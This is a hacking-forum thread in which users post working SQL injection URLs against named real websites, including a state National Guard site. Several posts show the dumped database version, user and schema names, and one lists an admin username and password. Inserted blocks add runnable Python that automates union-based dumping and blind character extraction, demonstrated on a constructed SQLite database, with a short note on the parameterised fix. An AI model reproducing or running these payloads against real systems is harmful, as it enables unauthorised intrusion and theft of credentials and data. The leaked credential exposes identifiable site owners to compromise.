SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Га-Ноцри

    Га-Ноцри Elder

    PHP:
    http://www.heatpipe.asia/news_content.php?id=-1708+union+select+1,2,0x48656c6c6f2c20776f726c6421,4,5,6,7--
     
  2. kingbeef

    kingbeef Reservists Of Antichat

    Travel agency site
    TIC 60
    PR 2

     
  3. Га-Ноцри

    Га-Ноцри Elder

    PHP:
    http://www.ju-jitsu-az.com/photos.php?cat=-3+union+select+1,2,concat_ws(0x03a,user(),database(),version()),4--
     
  4. vlad-i-mir

    vlad-i-mir New Member

    Code:
    http://cinv.tv/anons?id=-2%20union%20select%201,concat_ws(0x3a,username,password),3,4,5,6,7,8,9%20from%20modx_manager_users%20limit%200,1%20--
     
  5. Га-Ноцри

    Га-Ноцри Elder

    PHP:
    http://orka-aero.com/index.php?str=4&ido=429&idp=-710+union+select+1,2,3,4,file_priv,6,7,8,9+from+mysql.user--
     
  6. SS_47

    SS_47 Member

    PHP:
    http://www.peski.ru/index.php?action=news&id=3932)+and+1=2+union+select+1,user,3,password,5,6+from+mysql.user/*
     
  7. Га-Ноцри

    Га-Ноцри Elder

    PHP:
    http://www.springspartner.com/springsvegetables.php?cat=2&fruit=-2+union+select+1,concat_ws(0x03a,user(),database(),version()),3,4,5,6--
     
  8. SS_47

    SS_47 Member

    PHP:
    http://www.helicobacter.ru/index.php?i=-8+union+select+1,2,3,4,5,6,7,8,9,username,11,user_password,13+from+f_users+where+username='forum username goes here'
     
  9. nemaniak

    nemaniak Elder

    dma.state.mn.us PR-6
    Minnesota National Guard
    Code:
    www.dma.state.mn.us/press_room/e-zine/articles/index.php?item=-280+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    Code:
    5.0.95-log:ng_internet@localhost:ng_internet
    abireg.ru TIC-1300, 4k traffic
    Code:
    www.abireg.ru/sb/print.php?news=475'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21+--+
    Code:
    5.0.26-lk-log:abiregmsk_school@localhost:abiregmsk_school
    banglabarta24.net Alexa-164k blind
    Code:
    http://www.banglabarta24.net/english/Tamplate/news.php?news=UvSLyGQdxeQ' and 5=substring(version(),1,1) and 'tGbv'='tGbv&&ac=international
     
  10. Bb0y

    Bb0y Active Member

    ------
     
  11. Га-Ноцри

    Га-Ноцри Elder

    PHP:
    http://www.aussiewolf.hu/index.php?id=40+union+select+concat_ws(database(),user(),version())--
     
  12. Bb0y

    Bb0y Active Member

    PHP:
    http://threadandco.com/shop.php?id=42+union+select+1,concat_ws(0x3,id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
    ----------------------------------------------up
    PHP:
    http://www.glenferrie.com.au/shop.php?id=42+union+select+1,group_concat(0x0b,id,0x3a,user_name,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+login_admin+--
     
    #14752 Bb0y, 13 Apr 2012
  13. nemaniak

    nemaniak Elder

    temi.provincia.milano.it PR-7
    Code:
    http://temi.provincia.milano.it/donne/news/newst.php?news=-12260+UnIon+selECt+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84+--+
    Code:
    5.0.77-log:donne@10.120.192.16:d_portale
    allotment.org.uk PR-5 Alexa-49k
    Code:
    http://www.allotment.org.uk/diary/diary_day_detail.php?item=(348)and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,version(),user(),database())+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
    Code:
    5.0.95-community:lotty_1@localhost:lotty_11
    gemseducation.com PR-5 Alexa-182k
    Code:
    www.gemseducation.com/MENASA/gwa0029/contents.php?pageid=-712+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
    Code:
    5.0.77:gemsDBusr@localhost:gemseducation1
     
  14. kise

    kise Member

    cy 60, pr 4, dmoz
    http://life-prog.ru/view_video.php?id=-21%27+union+select+1,2,3,version%28%29,5,6+--+f
     
  15. mst

    mst New Member

    Injectable column: 2
    Version: 5.0.91-log
    Tables count: 1
    TIC:PR - 10:3
    SELECT database(): cheatsah_games
    ________________________________________
    Omsk State Drama Theatre
    Injectable column: 3
    Version: 5.1.61-0+squeeze1-log
    Tables count: 33
    adminlogin,adminpassword FROM admins - Admin211140:h18kUYP3
    TIC:PR - 300:3
    SELECT database(): z106032_omskdram
     
  16. kingbeef

    kingbeef Reservists Of Antichat

    TIC 3600
    PR 6

    Conscience and religion didn't let me push it any further :)
     
  17. VY_CMa

    VY_CMa Green member

    Couldn't get it any further; it looks like the filtering is done at the hosting level, it returns a 403 error if the URL contains union and select. If anyone can nudge me with some advice, I'd be glad.
     
  18. Га-Ноцри

    Га-Ноцри Elder

    For cycling fans.

    PHP:
    http://www.ciclisme.cat/calendario_listado.php?modalidad=-1+union+select+1,table_name,3+from+information_schema.tables+where+table_schema=0x6369636C69736D655F66656465636174--
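    The union-based payloads in this thread (posts 1, 3, 9, 13 and 18: a negative id to blank the real row, `UNION SELECT 1,2,3,...` grown until the column count matches, `concat_ws(0x3a,...)` dropped into the displayed column, and `information_schema.tables` queried with a hex-encoded schema name) as one runnable script. This is an added example, not code from the thread or from any site named in it. It runs against a constructed in-memory SQLite database (table and column names are assumptions), so the MySQL-only pieces are swapped for SQLite equivalents: `||` for `concat_ws`, `sqlite_version()` for `version()`, `sqlite_master` for `information_schema.tables`, and `char(...)` instead of `0x..` literals for quote-free strings. The mechanics are the same.

```python
"""Union-based SQL injection end to end, on a constructed SQLite target.

Added example (not from the thread). MySQL functions used in the posted
payloads are replaced by SQLite equivalents so it runs offline.
"""
import sqlite3

# Constructed sample data; the table and column names are assumptions.
SCHEMA = """
CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
INSERT INTO news VALUES (1, 'First post', 'hello'), (2, 'Second post', 'world');
CREATE TABLE admins(id INTEGER, username TEXT, password TEXT);
INSERT INTO admins VALUES (1, 'admin', 'secret');
"""


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_news(con, id_param):
    """Stand-in for news_content.php?id=...: the parameter is glued into the SQL."""
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    return con.execute(sql).fetchall()


def safe_news(con, id_param):
    """Hardened form: the value is bound as a parameter, never parsed as SQL."""
    sql = "SELECT id, title, body FROM news WHERE id=?"
    return con.execute(sql, (int(id_param),)).fetchall()


def no_quotes(s):
    """Quote-free string literal: the SQLite analogue of MySQL's 0x6369636c...
    trick, needed when quotes are escaped or stripped before the query."""
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def find_column_count(con, max_cols=30):
    """Grow `UNION SELECT 1,2,3,...` until the column counts agree and the
    error disappears; the thread's posters do this by hand (84 columns in one)."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_news(con, "-1 UNION SELECT " + cols + "--")
            return n
        except sqlite3.OperationalError:  # column count mismatch
            continue
    return None


def extract(con, expr, col, ncols):
    """Negative id makes the real query return nothing, so the only row the
    page renders is the UNION row, with `expr` in the displayed column `col`."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[col - 1] = expr
    rows = vulnerable_news(con, "-1 UNION SELECT " + ",".join(cols) + "--")
    return rows[0][col - 1]


def fingerprint(con, ncols):
    # concat_ws(0x3a, version(), ...) equivalent; char(58) is ':'
    expr = "sqlite_version() || char(58) || (SELECT count(*) FROM sqlite_master)"
    return extract(con, expr, 2, ncols)


def list_tables(con, ncols):
    # information_schema.tables WHERE table_schema=0x... equivalent
    where = "type=" + no_quotes("table")
    expr = "(SELECT group_concat(name) FROM sqlite_master WHERE " + where + ")"
    return extract(con, expr, 2, ncols)


def dump_admin(con, ncols):
    # concat_ws(0x3a, username, password) FROM admins LIMIT 0,1 equivalent
    expr = "(SELECT username || char(58) || password FROM admins LIMIT 1)"
    return extract(con, expr, 2, ncols)


if __name__ == "__main__":
    con = connect()
    n = find_column_count(con)
    print("columns:", n)
    print("version:objects:", fingerprint(con, n))
    print("tables:", list_tables(con, n))
    print("admin:", dump_admin(con, n))
    try:
        safe_news(con, "-1 UNION SELECT 1,2,3--")
    except ValueError as e:
        print("safe_news rejected the payload:", e)
```

    `find_column_count` automates the long `1,2,...,84` lists posted above; `no_quotes` plays the role of the `0x6369...` hex literal in the ciclisme.cat payload. `safe_news` is the fix: with a bound parameter the same payload fails in `int()` before any query is built, and even a string column bound this way would be sent as data, not SQL.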
     
  19. mst

    mst New Member

    Version: 5.0.95-community:c</title><meta name=keywords content="1d:5.0.95-community
    Tables count: ?
    TIC:PR - 20:4
    SELECT database(): ivcomua_db:c</title><meta name=keywords content="1d:ivcomua_db


    ================================================

    Injectable column: 2
    Version: 5.0.51a-24+lenny5-log
    Tables count: 125
    TIC:PR - 20:2


    ================================================

    Phone sales -)
    Injectable column: 5
    Version: 5.0.87.d10-ourdelta-log
    Tables count: 12
    TIC:PR - 10:1
    Admin directory may be here: /admin.php
    SELECT database(): Andry_phoneline
     
  20. mix0x0

    mix0x0 Active Member

    Code:
    http://www.statusx.ru/index.php?status=1+and+substring(@@version,1,1)=5
    Code:
    http://www.kmsmuseum.ru/news.php?status=1&id=28+and+substring(@@version,1,1)=5
    Code:
    http://www.lessons.jet-host.ru/product.php?status=1+and+1=0+union+Select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--+
    version: 5.5.16-55
    database: jetru_6402670_product
    user: jetru_6402670@192.168.0.78
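    The blind probes in this thread (`5=substring(version(),1,1)` on banglabarta24.net in post 9, `and substring(@@version,1,1)=5` in the two posts just above) answer one yes/no question per request. The added example below, which is not code from the thread or from any site named in it, turns that oracle into a character-by-character extractor: a binary search over the code point of each position, seven requests per character for ASCII, stopping when `substr()` runs past the end. It runs against a constructed in-memory SQLite table (names are assumptions), so MySQL's `ascii(substring(@@version,i,1))` becomes `unicode(substr(sqlite_version(),i,1))`.

```python
"""Boolean-blind extraction through a page that only shows hit or miss.

Added example (not from the thread). SQLite stands in for MySQL so it runs
offline; the oracle logic is the same as with `and substring(@@version,1,1)=5`.
"""
import sqlite3


class Target:
    """Stand-in for news.php?id=28: one row, and the attacker sees only whether
    the article rendered. Nothing from the database is ever echoed."""

    def __init__(self):
        self.con = sqlite3.connect(":memory:")
        # Constructed sample row; table and column names are assumptions.
        self.con.executescript(
            "CREATE TABLE news(id INTEGER, title TEXT);"
            "INSERT INTO news VALUES (28, 'Exhibition opens');"
        )
        self.requests = 0  # how many page loads the attack costs

    def page_shows_article(self, id_param):
        self.requests += 1
        sql = "SELECT title FROM news WHERE id=" + id_param  # injectable
        return len(self.con.execute(sql).fetchall()) > 0


def major_version_is(target, digit):
    """The thread's one-shot probe: `and substring(@@version,1,1)=5`.
    SQLite does not coerce text to integer in comparisons, so compare code points."""
    probe = f"28 AND unicode(substr(sqlite_version(),1,1))={ord(str(digit))}"
    return target.page_shows_article(probe)


def blind_char(target, expr, pos):
    """Binary search the code point of character `pos` of `expr` (7 requests
    for the ASCII range). Returns 0 once `pos` is past the end: substr() yields
    '' there, unicode('') is NULL, and a NULL comparison makes the WHERE false
    on every probe, so the search collapses to 0."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi + 1) // 2
        probe = f"28 AND unicode(substr({expr},{pos},1))>={mid}"
        if target.page_shows_article(probe):
            lo = mid
        else:
            hi = mid - 1
    return lo


def blind_extract(target, expr, max_len=64):
    """Pull the value of SQL expression `expr` one character at a time."""
    out = []
    for pos in range(1, max_len + 1):
        code = blind_char(target, expr, pos)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


def extraction_matches_library(target):
    """Check: what the oracle leaked equals the real library version string."""
    return blind_extract(target, "sqlite_version()") == sqlite3.sqlite_version


if __name__ == "__main__":
    t = Target()
    print("major version is 5?", major_version_is(t, 5))
    print("major version is 3?", major_version_is(t, 3))
    t = Target()
    print("version:", blind_extract(t, "sqlite_version()"), "in", t.requests, "requests")
```

    Each request carries one bit, which is why the posters above stop at confirming the major version by hand; the loop is what a tool does with the same oracle. The cost is visible in `requests`: roughly seven page loads per character, so a version string or a single credential is cheap, a full table dump is not, and that request volume is also what a log-based detection would key on.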
     